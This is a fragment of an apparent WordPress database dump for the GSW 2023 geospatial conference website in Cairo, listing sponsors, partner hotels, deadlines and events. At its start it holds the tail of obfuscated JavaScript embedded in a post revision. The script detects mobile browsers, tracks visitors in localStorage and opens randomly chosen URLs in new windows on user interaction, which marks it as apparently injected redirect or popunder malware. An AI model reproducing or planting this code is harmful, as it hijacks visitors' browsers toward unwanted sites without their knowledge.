)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:34:54','2023-06-24 01:34:54','',3066,'https://gsw2023.com/?p=4795',0,'revision','',0),
(4796,1,'2023-06-24 01:36:23','2023-06-24 01:36:23','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570411308{margin-top: 130px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570236779{margin-top: -20px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" 